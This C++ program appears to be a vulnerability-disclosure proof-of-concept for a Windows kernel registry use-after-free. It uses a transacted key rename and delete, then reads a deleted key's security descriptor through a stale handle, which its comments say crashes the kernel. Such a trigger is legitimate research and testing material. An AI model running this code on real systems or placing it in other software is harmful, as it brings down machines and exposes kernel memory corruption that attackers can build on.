#include <Windows.h>
#include <ktmw32.h>
#include <sddl.h>

#include <cstdio>

#pragma comment(lib, "ktmw32")

int main(int argc, char** argv) {
  LSTATUS st;

  //
  // Recursively delete the test subtree to make sure we're starting from
  // a fresh state.
  //

  st = RegDeleteTreeA(HKEY_CURRENT_USER, "Test");

  if (st != ERROR_SUCCESS && st != ERROR_FILE_NOT_FOUND) {
    printf("RegDeleteTreeA failed with error %d\n", st);
    return 1;
  }

  //
  // Create the test tree structure.
  //

  HKEY hTestRoot;
  st = RegCreateKeyExA(HKEY_CURRENT_USER,
                       "Test",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hTestRoot,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExA #1 failed with error %d\n", st);
    return 1;
  }

  HKEY hTestKey;
  st = RegCreateKeyExA(hTestRoot,
                       "Key1\\SubKey",
                       0,
                       NULL,
                       REG_OPTION_VOLATILE,
                       KEY_ALL_ACCESS,
                       NULL,
                       &hTestKey,
                       NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyExA #2 failed with error %d\n", st);
    return 1;
  }

  //
  // Set a custom, unique security descriptor on the "SubKey", to ensure that
  // the SD will have only one reference and will get freed once that reference
  // is dropped.
  //

  PSECURITY_DESCRIPTOR lpSecurityDescriptor;

  CONST WCHAR* szSD = L"D:(A;;KA;;;WD)"; // Allow KEY_ALL_ACCESS for Everyone.

  if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(szSD,
                                                            SDDL_REVISION_1,
                                                            &lpSecurityDescriptor,
                                                            NULL)) {
    printf("ConvertStringSecurityDescriptorToSecurityDescriptorW failed with "
           "error %u\n", GetLastError());
    return 1;
  }

  st = RegSetKeySecurity(hTestKey, DACL_SECURITY_INFORMATION, lpSecurityDescriptor);

  if (st != ERROR_SUCCESS) {
    printf("RegSetKeySecurity failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hTestKey);

  //
  // Create a transaction.
  //

  HANDLE hTrans = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
  if (hTrans == INVALID_HANDLE_VALUE) {
    printf("CreateTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  //
  // Open HKCU\Test\Key1 twice, and use the second handle to rename it
  // transactionally.
  //

  HKEY hTestKeyOld;
  st = RegOpenKeyExA(hTestRoot, "Key1", 0, KEY_ALL_ACCESS, &hTestKeyOld);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExA #1 failed with error %d\n", st);
    return 1;
  }

  HKEY hTestKeyNew;
  st = RegOpenKeyTransactedA(hTestRoot,
                             "Key1",
                             0,
                             KEY_ALL_ACCESS,
                             &hTestKeyNew,
                             hTrans,
                             NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyTransactedA failed with error %d\n", st);
    return 1;
  }

  st = RegRenameKey(hTestKeyNew, NULL, L"Key2");

  if (st != ERROR_SUCCESS) {
    printf("RegRenameKey failed with error %d\n", st);
    return 1;
  }

  //
  // Open the "SubKey" twice through both the old and new instances of the
  // parent key.
  //

  HKEY hSubKeyOldParent;
  st = RegOpenKeyExA(hTestKeyOld,
                     "SubKey",
                     0,
                     KEY_ALL_ACCESS,
                     &hSubKeyOldParent);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExA #2 failed with error %d\n", st);
    return 1;
  }

  HKEY hSubKeyNewParent;
  st = RegOpenKeyExA(hTestKeyNew,
                     "SubKey",
                     0,
                     KEY_ALL_ACCESS,
                     &hSubKeyNewParent);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExA #3 failed with error %d\n", st);
    return 1;
  }

  //
  // Delete the "SubKey" transactionally through the renamed parent.
  //

  st = RegDeleteKeyTransactedA(hTestKeyNew, "SubKey", 0, 0, hTrans, 0);

  if (st != ERROR_SUCCESS) {
    printf("RegDeleteKeyTransactedA failed with error %d\n", st);
    return 1;
  }

  //
  // Commit the transaction.
  //

  if (!CommitTransaction(hTrans)) {
    printf("CommitTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  //
  // Request the security descriptor of the deleted "SubKey" through the
  // duplicate KCB, which should result in dereferencing a freed kernel pool
  // pointer and a crash.
  //

  DWORD cbSecurityDescriptor = 0;
  st = RegGetKeySecurity(hSubKeyOldParent,
                         DACL_SECURITY_INFORMATION,
                         NULL,
                         &cbSecurityDescriptor);

  if (st != ERROR_SUCCESS) {
    printf("RegGetKeySecurity failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hSubKeyNewParent);
  RegCloseKey(hSubKeyOldParent);
  RegCloseKey(hTestKeyNew);
  RegCloseKey(hTestKeyOld);
  RegCloseKey(hTestRoot);
  CloseHandle(hTrans);

  return 0;
}
